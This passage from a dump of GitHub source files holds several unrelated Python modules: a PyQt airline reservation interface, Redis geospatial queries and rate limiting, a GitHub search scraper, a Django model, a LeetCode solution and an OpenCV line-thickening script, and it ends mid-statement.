self.retranslateUi(System_rezerwacji_biletow)\n self.stos_tabel.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(System_rezerwacji_biletow)\n\n self.stos_tabel.setCurrentWidget(self.strona_klienci)\n self.tabela_klienci.setRowCount(len(self.system.get_klienci()))\n for i in range(len(self.system.get_klienci())):\n self.tabela_klienci.setItem(i, 0, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_imie()))\n self.tabela_klienci.setItem(i, 1, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_nazwisko()))\n self.tabela_klienci.setItem(i, 2, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_pesel()))\n\n def retranslateUi(self, System_rezerwacji_biletow):\n _translate = QtCore.QCoreApplication.translate\n System_rezerwacji_biletow.setWindowTitle(_translate(\"System_rezerwacji_biletow\", \"System rezerwacji biletow\"))\n self.przycisk_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Klienci\"))\n self.przycisk_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Samoloty\"))\n self.przysick_trasy.setText(_translate(\"System_rezerwacji_biletow\", \"Trasy\"))\n self.przycisk_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Lotniska\"))\n self.przycisk_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Loty\"))\n self.przycisk_rezerwacje.setText(_translate(\"System_rezerwacji_biletow\", \"Rezerwacja\"))\n self.przycisk_zapis.setText(_translate(\"System_rezerwacji_biletow\", \"Zapis\"))\n self.przysick_odczyt.setText(_translate(\"System_rezerwacji_biletow\", \"Odczyt\"))\n self.napis_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"

Klienci

\"))\n item = self.tabela_klienci.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_klienci.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Imie/Nazwa\"))\n item = self.tabela_klienci.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Nazwisko\"))\n item = self.tabela_klienci.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Pesel/Nip\"))\n self.przycisk_usun_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"

Samoloty

\"))\n item = self.tabela_samoloty.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_samoloty.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Rodzaj samolotu\"))\n self.przycisk_usun_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_trasy.setText(_translate(\"System_rezerwacji_biletow\", \"

Trasy

\"))\n item = self.tabela_trasy.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_trasy.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt startowy\"))\n item = self.tabela_trasy.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt docelowy\"))\n item = self.tabela_trasy.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Odległość\"))\n item = self.tabela_trasy.horizontalHeaderItem(3)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Czas\"))\n self.przycisk_usun.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"

Lotniska

\"))\n item = self.tabela_lotniska.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_lotniska.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Miasto\"))\n item = self.tabela_lotniska.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Państwo\"))\n self.przycisk_usun_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_loty.setText(_translate(\"System_rezerwacji_biletow\", \"

Loty

\"))\n item = self.tabela_loty.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_loty.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt Startowy\"))\n item = self.tabela_loty.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt Docelowy\"))\n item = self.tabela_loty.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Długość\"))\n item = self.tabela_loty.horizontalHeaderItem(3)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Czas\"))\n item = self.tabela_loty.horizontalHeaderItem(4)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Rodzaj Samolotu\"))\n item = self.tabela_loty.horizontalHeaderItem(5)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Data\"))\n item = self.tabela_loty.horizontalHeaderItem(6)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"miejsca zaj/max\"))\n\n self.przycisk_usun_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n\n def przycisk_klienci_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_klienci)\n self.tabela_klienci.setRowCount(len(self.system.get_klienci()))\n for i in range(len(self.system.get_klienci())):\n self.tabela_klienci.setItem(i, 0, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_imie()))\n self.tabela_klienci.setItem(i, 1, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_nazwisko()))\n self.tabela_klienci.setItem(i, 2, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_pesel()))\n\n def przycisk_samoloty_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_samoloty)\n self.tabela_samoloty.setRowCount(len(self.system.get_samoloty()))\n for i in range(len(self.system.get_samoloty())):\n self.tabela_samoloty.setItem(i,0,QtWidgets.QTableWidgetItem(self.system.get_samoloty()[i].__str__()))\n\n def przycisk_trasy_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_trasy)\n self.tabela_trasy.setRowCount(len(self.system.get_trasy()))\n for i in range(len(self.system.get_trasy())):\n self.tabela_trasy.setItem(i,0,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_lotniska_w_trasy()[0])))\n self.tabela_trasy.setItem(i,1,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_lotniska_w_trasy()[1])))\n self.tabela_trasy.setItem(i,2,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_czas())+\" km\"))\n self.tabela_trasy.setItem(i,3,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_odleglosc())+\" min\"))\n\n\n def przycisk_lotniska_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_lotniska)\n self.tabela_lotniska.setRowCount(len(self.system.get_lotniska()))\n for i in range(len(self.system.get_lotniska())):\n self.tabela_lotniska.setItem(i,0,QtWidgets.QTableWidgetItem(self.system.get_lotniska()[i].get_miasto()))\n self.tabela_lotniska.setItem(i,1,QtWidgets.QTableWidgetItem(self.system.get_lotniska()[i].get_panstwo()))\n\n def przycisk_loty_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_loty)\n self.tabela_loty.setRowCount(len(self.system.get_loty()))\n\n for i in range(len(self.system.get_loty())):\n self.tabela_loty.setItem(i,0,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_lotniska_w_trasy()[0])))\n self.tabela_loty.setItem(i,1,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_lotniska_w_trasy()[1])))\n self.tabela_loty.setItem(i,2,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_czas())))\n self.tabela_loty.setItem(i,3,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_odleglosc())))\n self.tabela_loty.setItem(i,4,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_samolot())))\n self.tabela_loty.setItem(i,5,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_data())))\n self.tabela_loty.setItem(i,6,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_zajete())+\"/\"+str(self.system.get_loty()[i].get_samolot().get_miejsca())))\n\n\n def rezerwacja_click(self):\n Dialog = QtWidgets.QDialog()\n ui = menu_rezerwacja(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_loty_click()\n\n def przycisk_zapis_click(self):\n\n Dialog = QtWidgets.QDialog()\n ui = Ui_Dialog_2()\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.system.zapisz_wszystko()\n\n def przycisk_odczyt_click(self):\n Dialog = QtWidgets.QDialog()\n ui = Ui_Dialog(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n\n def dodaj_klienci(self):\n Dialog = QtWidgets.QDialog()\n ui = Menu_klient(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_klienci_click()\n\n def usun_klienci(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,1)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_klienci_click()\n\n def dodaj_samoloty(self):\n Dialog = QtWidgets.QDialog()\n ui = menu_samoloty(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_samoloty_click()\n\n def usun_samoloty(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,2)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_samoloty_click()\n\n def dodaj_trasy(self):\n menu_trasy = QtWidgets.QDialog()\n ui = Ui_menu_trasy(self.system)\n ui.setupUi(menu_trasy)\n menu_trasy.show()\n menu_trasy.exec_()\n self.przycisk_trasy_click()\n\n def usun_trasy(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,3)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_trasy_click()\n\n def dodaj_lotniska(self):\n dodawani_lotniska = QtWidgets.QDialog()\n ui = Ui_dodawani_lotniska(self.system)\n ui.setupUi(dodawani_lotniska)\n dodawani_lotniska.show()\n dodawani_lotniska.exec_()\n self.przycisk_lotniska_click()\n\n def usun_lotniska(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,4)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_lotniska_click()\n\n def dodaj_loty(self):\n menuloty = QtWidgets.QDialog()\n ui = Ui_menuloty(self.system)\n ui.setupUi(menuloty)\n menuloty.show()\n menuloty.exec_()\n self.przycisk_loty_click()\n\n def usun_loty(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,5)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_loty_click()\n\n def animacja(self):\n self.anim = QPropertyAnimation(self.lewa_ramka,b\"minimumWidth\")\n self.anim.setDuration(400)\n if self.lewa_ramka.width() == 400:\n self.anim.setStartValue(400)\n self.anim.setEndValue(120)\n self.przycisk_klienci.setText(\"\")\n self.przycisk_samoloty.setText(\"\")\n self.przysick_trasy.setText(\"\")\n self.przycisk_lotniska.setText(\"\")\n self.przycisk_loty.setText(\"\")\n self.przysick_odczyt.hide()\n else:\n self.anim.setStartValue(120)\n self.anim.setEndValue(400)\n self.przycisk_klienci.setText(\"Klienci\")\n self.przycisk_samoloty.setText(\"Samoloty\")\n self.przysick_trasy.setText(\"Trasy\")\n self.przycisk_lotniska.setText(\"Lotniska\")\n self.przycisk_loty.setText(\"Loty\")\n self.przysick_odczyt.show()\n self.anim.start()\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":52073,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74968765847","text":"from haversine import haversine, Unit\nfrom math import floor\n\ndef sequence_number(size,p):\n λ, ϕ = p\n λ_s, φ_s = size if type(size)==tuple else (size,size)\n\n λ_p, φ_p = (90 - λ, 360 + ϕ if ϕ < 0 else ϕ)\n\n s = floor(λ_p / λ_s) * floor(360.0 / φ_s) + floor(φ_p / φ_s) + 1\n\n return s\n\ndef sequence_partitions(size):\n λ_s, φ_s = size if type(size)==tuple else (size,size)\n N_λ = floor(180 / λ_s)\n N_φ = floor(360 / φ_s)\n return N_λ, N_φ\n\ndef quadrangle_for_sequence_number(size,s):\n λ_s, φ_s = size if type(size)==tuple else (size,size)\n\n N_λ, N_φ = sequence_partitions(size)\n\n z = (s - 1) % (N_λ * N_φ)\n φ_p = (z % N_φ) * φ_s\n nw = (90 - floor(z / N_φ) * λ_s, φ_p - 360 if φ_p > 180 else φ_p)\n se = (nw[0] - λ_s, nw[1] + φ_s)\n return [nw,se]\n\ndef is_valid_datetime_partition(partition,t):\n if t.second!=0 or \\\n t.microsecond!=0 or \\\n t.second % partition != 0:\n return False\n return True\n\ndef sequence_numbers_for_bounds(size,*args):\n if len(args)==1:\n nw = args[0][0]\n se = args[0][1]\n elif len(args)==2:\n nw = args[0]\n se = args[1]\n else:\n raise ValueError('Too many arguments after client and key: '+str(len(args)))\n p = 0.00000000001\n s_nw = sequence_number(size,nw)\n s_ne = sequence_number(size,(nw[0],se[1]-p))\n if s_ne < s_nw:\n for s in sequence_numbers_for_bounds(size,nw,(se[0],-p)):\n yield s\n for s in sequence_numbers_for_bounds(size,(nw[0],p),se):\n yield s\n width = s_ne - s_nw + 1\n N_λ, N_φ = sequence_partitions(size)\n\n s_se = sequence_number(size,(se[0]-p,se[1]-p))\n current = s_nw\n while current <= s_se:\n row_start = current\n for _ in range(width):\n yield current\n current += 1\n current = row_start + N_φ\n\ndef quadrangles_for_bounds(size,*args):\n λ_s, φ_s = size if type(size)==tuple else (size,size)\n if len(args)==1:\n nw = args[0][0]\n se = args[0][1]\n elif len(args)==2:\n nw = args[0]\n se = args[1]\n else:\n raise ValueError('Too many arguments after client and key: '+str(len(args)))\n\n # TODO: does not handle crossing lon=0\n p = 0.00000000001\n nw_quadrangle = quadrangle_for_sequence_number(size,sequence_number(size,nw))\n se_quadrangle = quadrangle_for_sequence_number(size,sequence_number(size,(se[0]-p,se[1]-p)))\n\n current = [nw_quadrangle[0],nw_quadrangle[1]]\n\n while current[0][0] > se_quadrangle[1][0]:\n yield current\n\n if current[0][1] + φ_s >= se_quadrangle[1][1]:\n current[0] = (current[0][0] - λ_s, nw_quadrangle[0][1])\n current[1] = (current[1][0] - λ_s, current[0][1] + φ_s)\n else:\n current[0] = (current[0][0], current[0][1] + φ_s)\n current[1] = (current[1][0], current[1][1] + φ_s)\n\ndef query_circle(client, partition_key, center, radius, unit='km', bounds=None):\n \"\"\"\n Iterates the values that fail within the defined circle\n for the geospatial key.\n\n Arguments:\n client - the Redis client instance\n partition_key - the geospatial set key\n center - the center of the circle as a tuple/list (lat,lon)\n radius - the radius of the circle\n unit - the unit of measure for the radius (defaults to km)\n bounds - A bounding box to trip the results (defaults to None)\n \"\"\"\n # note: query is lon,lat\n result = client.georadius(partition_key,center[1],center[0],radius,unit=unit,withcoord=True)\n\n nw = bounds[0] if bounds is not None else None\n se = bounds[1] if bounds is not None else None\n\n for key, pos in result:\n\n # Note: pos is lon, lat\n\n lat = pos[1]\n lon = pos[0]\n\n # check boundary\n if bounds is not None and lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]:\n continue\n\n yield key, (lat,lon)\n\ndef query_quadrangle(client, partition_key, *args):\n \"\"\"\n Iterates the values that fail within the defined quadrangle\n for the geospatial key.\n\n Arguments:\n client - the Redis client instance\n partition_key - the geospatial set key\n bounds - the bounds as an array of [nw,se]\n - or -\n nw - the north west corner of the quadrangle as a tuple/list (lat,lon)\n se - the south east corner of the quadrangle as a tuple/list (lat,lon)\n \"\"\"\n\n if len(args)==1:\n nw = args[0][0]\n se = args[0][1]\n elif len(args)==2:\n nw = args[0]\n se = args[1]\n else:\n raise ValueError('Too many arguments after client and key: '+str(len(args)))\n\n lat_size = abs(nw[0] - se[0])\n lon_size = abs(nw[1] - se[1])\n\n # inscribe the quadrangle onto a circle with radius from center to\n center = (nw[0] - lat_size/2, nw[1] + lon_size/2)\n radius = haversine(center,nw,unit=Unit.KILOMETERS)\n\n return query_circle(client,partition_key,center,radius,bounds=[nw,se])\n\ndef query_region(client,partition_key,*args,size=0.5,by_quadrangles=False):\n if len(args)==1:\n nw = args[0][0]\n se = args[0][1]\n elif len(args)==2:\n nw = args[0]\n se = args[1]\n else:\n raise ValueError('Too many arguments after client and key: '+str(len(args)))\n\n if by_quadrangles:\n for quadrangle in quadrangles_for_bounds(size,nw,se):\n for key, pos in query_quadrangle(client,partition_key,quadrangle):\n\n lat = pos[0]\n lon = pos[1]\n\n # check boundary\n if lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]:\n #print(pos)\n continue\n\n yield key, pos\n else:\n for sequence_number in sequence_numbers_for_bounds(size,nw,se):\n\n q_nw, q_se = quadrangle_for_sequence_number(size,sequence_number)\n\n for key, pos in query_quadrangle(client,partition_key,q_nw,q_se):\n\n lat = pos[0]\n lon = pos[1]\n\n # check boundary\n if lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]:\n #print(pos)\n continue\n\n yield key, pos\n","repo_name":"alexmilowski/redis-aqi","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"69869678807","text":"#\n# @lc app=leetcode.cn id=12 lang=python3\n#\n# [12] 整数转罗马数字\n#\n\n# @lc code=start\nclass Solution:\n def intToRoman(self, num: int) -> str:\n length = len(str(num))\n roma = [(\"M\", \"\", \"\"), (\"C\", \"D\", \"M\"), (\"X\", \"L\", \"C\"), (\"I\", \"V\", \"X\")]\n roma = roma[-length:]\n ans = \"\"\n for i in range(length):\n if length - i - 1 == 0:\n number = num\n else:\n number = num // 10**(length-i-1)\n a, b, c = roma[i]\n if number == 0:\n continue\n elif number <= 3:\n ans += a*number\n elif number == 4:\n ans += a + b\n elif number <= 8:\n ans += b + a*(number-5)\n else:\n ans += a + c\n num = num % 10**(length-i-1)\n return ans\n\n\n# @lc code=end\nS = Solution()\nnum = 1994\nprint(S.intToRoman(num))\n","repo_name":"mkroen/mkleetcode","sub_path":"leetcode/12.整数转罗马数字.py","file_name":"12.整数转罗马数字.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14231542599","text":"import requests\nfrom requests.exceptions import Timeout\nimport random\nfrom bs4 import BeautifulSoup\n\n\nclass Service:\n def __init__(self):\n self.base_url = \"https://github.com\"\n\n def scrape_results_urls(self, request_parameters):\n try:\n url = self.prepare_search_url(request_parameters)\n github_response = self.make_request(url, request_parameters[\"proxies\"])\n github_content = self.get_page_content(github_response)\n urls = self.extract_content(github_content, request_parameters[\"type\"])\n full_urls = self.add_base_url(urls)\n return full_urls\n except requests.exceptions.ProxyError as err:\n return err\n except Timeout as err:\n return err\n\n def prepare_search_url(self, request_parameters):\n formatted_keywords = self.format_keywords(request_parameters[\"keywords\"])\n search_type = request_parameters[\"type\"]\n url = \"{}/search?utf8=✓&q={}&type={}\".format(self.base_url, formatted_keywords, search_type)\n return url\n\n def make_request(self, url, proxies):\n proxies_dict = {\"http\": self.random_proxy(proxies), \"https\": self.random_proxy(proxies)}\n github_response = requests.get(url, proxies=proxies_dict, timeout=10)\n return github_response\n\n def get_page_content(self, github_response):\n github_html = github_response.content\n return github_html\n\n def format_keywords(self, keywords_list):\n return '+'.join(keywords_list)\n\n def random_proxy(self, proxies):\n return random.choice(proxies)\n\n def extract_content(self, response_content, search_type):\n soup = BeautifulSoup(response_content, 'html.parser')\n if search_type.lower() == \"repositories\":\n return self.extract_repositories_path(soup)\n elif search_type.lower() == \"issues\":\n return self.extract_issues_path(soup)\n elif search_type.lower() == \"wikis\":\n return self.extract_wikis_path(soup)\n else:\n return None\n\n def extract_repositories_path(self, soup):\n repos = []\n for repo_el in soup.findAll('ul', {'class': 'repo-list'}):\n for a in repo_el.findAll(\"a\", {'class': 'v-align-middle'}):\n repos.append(a.get(\"href\"))\n return repos\n\n def extract_wikis_path(self, soup):\n wikis = []\n for wiki_el in soup.findAll('div', {'id': 'wiki_search_results'}):\n for a in wiki_el.findAll(\"a\", class_=False):\n href = a.get(\"href\")\n if \"/wiki/\" in href:\n wikis.append(a.get(\"href\"))\n return wikis\n\n def extract_issues_path(self, soup):\n wikis = []\n for wiki_el in soup.findAll('div', {'id': 'issue_search_results'}):\n for a in wiki_el.findAll(\"a\", class_=False):\n href = a.get(\"href\")\n if \"/issues/\" in href or \"/pull/\" in href:\n wikis.append(href)\n return wikis\n\n def add_base_url(self, repo_urls):\n full_urls = [self.base_url + url for url in repo_urls]\n return full_urls\n\n\n","repo_name":"rszymani/scraper-github","sub_path":"Service.py","file_name":"Service.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72419301848","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport workspace.recently_opened_notebooks_list.recently_opened_notebooks_list_viewgtk as viewgtk_notebook_list\nfrom app.service_locator import ServiceLocator\n\n\nclass RecentlyOpenedNotebooksListPresenter(object):\n\n def __init__(self, workspace, recently_opened_notebooks):\n self.sidebar = ServiceLocator.get_main_window().sidebar\n self.hbchooser = ServiceLocator.get_main_window().headerbar.hb_right.notebook_chooser\n self.kernelspecs = ServiceLocator.get_kernelspecs()\n self.workspace = workspace\n self.recently_opened_notebooks = recently_opened_notebooks\n self.recently_opened_notebooks.register_observer(self)\n\n def change_notification(self, change_code, notifying_object, parameter):\n\n if change_code == 'add_recently_opened_notebook':\n item = parameter\n\n for widget in [self.sidebar, self.hbchooser]:\n icon_normal = self.kernelspecs.get_normal_sidebar_icon(item['kernelname'])\n icon_active = self.kernelspecs.get_active_sidebar_icon(item['kernelname'])\n widget.recent_notebooks_list_view.add_item(item['pathname'], item['kernelname'], item['date'], icon_normal, icon_active)\n if widget.recent_notebooks_list_view.visible_items_count >= 1:\n widget.recent_notebooks_label_revealer.set_reveal_child(True)\n widget.recent_notebooks_list_view_wrapper.show_all()\n\n if change_code == 'remove_recently_opened_notebook':\n item = parameter\n\n for widget in [self.sidebar, self.hbchooser]:\n widget.recent_notebooks_list_view.remove_item_by_pathname(item['pathname'])\n if widget.recent_notebooks_list_view.visible_items_count < 1:\n widget.recent_notebooks_label_revealer.set_reveal_child(False)\n widget.recent_notebooks_list_view_wrapper.hide()\n\n\n","repo_name":"cvfosammmm/Porto","sub_path":"workspace/recently_opened_notebooks_list/recently_opened_notebooks_list_presenter.py","file_name":"recently_opened_notebooks_list_presenter.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"31"} +{"seq_id":"71467558488","text":"from django.db import models\nfrom blood_storage.models import BloodStorage\n\n# Create your models here.\n\n\nclass BloodCollection(models.Model):\n \"\"\"\n Blood collection event that collects blood for a certain BloodStorage object\n e.g. Doniranje krvi u Zagrebu u ogranizaciji Crvenog Kriza Zagreb\n storage = Crveni Kriz Zagreb\n\n \"\"\"\n\n\n name = models.CharField(max_length=50)\n\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n\n location_lat = models.FloatField(null=True)\n location_lon = models.FloatField(null=True)\n\n storage = models.ForeignKey(BloodStorage, on_delete=models.DO_NOTHING)\n\n\n def __str__(self):\n return self.name + \" \" + str(self.start_time) + \": \" + self.storage.name","repo_name":"aostrun/TryCodeCatchHackathon","sub_path":"django_template/blood_collection/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14493150479","text":"import os\nimport redis\nimport hashlib\nimport time\n\nimport urllib.parse as urlparse\n\nfrom app.schemas.schemas import TrackEvent\nfrom app.utils.constants import REDIS_SS_DELIMITER\n\nclass RedisClient:\n\n def __init__(self):\n endpoint_url = os.environ.get(\"REDIS_URL\", \"redis://127.0.0.1:6379\")\n url = urlparse.urlparse(endpoint_url)\n self.client = redis.StrictRedis(host=url.hostname, port=url.port, password=url.password, charset='utf-8', decode_responses=True)\n\n # Default to every 10 minutes, todo make this configurable\n self.DEFAULT_INTERVAL = 600\n\n # Default to 1 token\n self.DEFAULT_REFILL = 1\n\n def _set(self, key, val, expiration):\n return self.client.set(key, val, ex=expiration)\n\n def _exists(self, key):\n return self.client.get(key)\n\n def _get(self, key, default_value=None):\n val = self.client.get(key)\n\n return val if val is not None else default_value\n\n def _updateMessageHistory(self, userId, currentTime, messageId):\n ssName = self._hashKey(userId)\n self.client.zrem(ssName, messageId)\n self.client.zadd(ssName, {messageId: currentTime})\n\n def _cleanSortedSet(self, prevMessageIds, currentMessageIds, ssName):\n messagesToClean = set(prevMessageIds).difference(set(currentMessageIds))\n for idToDelete in messagesToClean:\n print(f\"Deleting messageId {idToDelete} from {ssName} sorted set\")\n self.client.zrem(ssName, idToDelete)\n\n def rankMessages(self, userId, availableMessages):\n\n idToMessage = {m.id: m for m in availableMessages}\n\n ssName = self._hashKey(userId)\n sortedMessageHistory = self.client.zrange(ssName, 0, -1, desc=False, withscores=True)\n\n prevMessageIds = list(map(lambda x: int(x[0]), sortedMessageHistory))\n\n # clean up messageIds that have been deleted\n self._cleanSortedSet(prevMessageIds, idToMessage.keys(), ssName)\n\n orderedCandidates = []\n for candidateId, last_sent in sortedMessageHistory:\n try:\n orderedCandidates.append(idToMessage[int(candidateId)])\n del idToMessage[int(candidateId)]\n except KeyError:\n print(f\"Did not find {candidateId} in the available messages!\")\n\n # This prioritizes messages that have not been sent before\n messagesToSend = [v for k, v in idToMessage.items()]\n\n messagesToSend.extend(orderedCandidates)\n\n for candidateMessage in messagesToSend:\n yield candidateMessage\n\n\n def checkMessage(self, userId, message):\n print(f\"Checking rate limiting for user id {userId} and message id {message.id}\")\n currentTime = time.time()\n rawKey = f\"{userId}_{message.id}\"\n\n refillKey = self._hashKey(rawKey) + \"_last_reset\"\n bucketKey = self._hashKey(rawKey) + \"_tokens\"\n\n lastRefilled = float(self._get(refillKey, currentTime))\n\n # If the current time minus last refilled is 0 - its the first request. We need to add both keys\n if (currentTime - lastRefilled == 0) or (currentTime - lastRefilled) >= message.rule.seconds:\n # expire refill tokens every day to clean up old messages\n self._set(bucketKey, message.rule.tokens, message.rule.seconds)\n self._set(refillKey, currentTime, message.rule.seconds)\n else:\n tokens_left = int(self._get(bucketKey))\n\n if tokens_left < 1:\n return False\n\n self.client.decr(bucketKey, amount=1)\n # Update/Add the message to the user's sorted set message history\n self._updateMessageHistory(userId, currentTime, message.id)\n return True\n\n def _hashKey(self, rawKey):\n return hashlib.sha512(str.encode(rawKey)).hexdigest()\n\n def updateTrackRank(self, track_event: TrackEvent):\n ssName = track_event.guild_id + \"_track_ranks\"\n memberName = track_event.id + REDIS_SS_DELIMITER + track_event.title\n self.client.zincrby(ssName, 1, memberName)\n\n def getNTopTracks(self, guild_id:str, n: int):\n ssName = guild_id + \"_track_ranks\"\n return self.client.zrevrange(ssName, 0, n, withscores=True)\n","repo_name":"rhwang10/iduna","sub_path":"app/redis/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7099276598","text":"#to make thick\n\nimport numpy as np\nimport cv2\n\n# read\nimg = cv2.imread('1new.png', cv2.IMREAD_GRAYSCALE)\n\n# increase contrast\npxmin = np.min(img)\npxmax = np.max(img)\nimgContrast = (img - pxmin) / (pxmax - pxmin) * 255\n\n# increase line width\nkernel = np.ones((3, 3), np.uint8)\nimgMorph = cv2.erode(imgContrast, kernel, iterations = 5)\n\n# write\ncv2.imwrite('mid0.png', imgMorph)\n\n##############################################################################\n\n#for split\nnew_a = []\ntracker = 0\nwhile(1):\n#\timg = imgMorph # Read in the image and convert to grayscale\n\t\n\t#print(img.shape)\n\t#print(gray.shape)\n\timg = cv2.imread('mid'+str(tracker)+'.png') # Read in the image and convert to grayscale\n\ttracker += 1\n\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tgray = 255*(gray < 128).astype(np.uint8) # To invert the text to white\n\n\n\ta = 0\n\tb = 0\n\tcount = 0\n\tflag = True\n\t\n\tfor j in range(len(gray[0])):\n\t\ta = 0\n\t\tfor i in range(len(gray)):\n\t\t\ta += gray[i][j]\n\t\tif(a==0 and b!=0 and count > 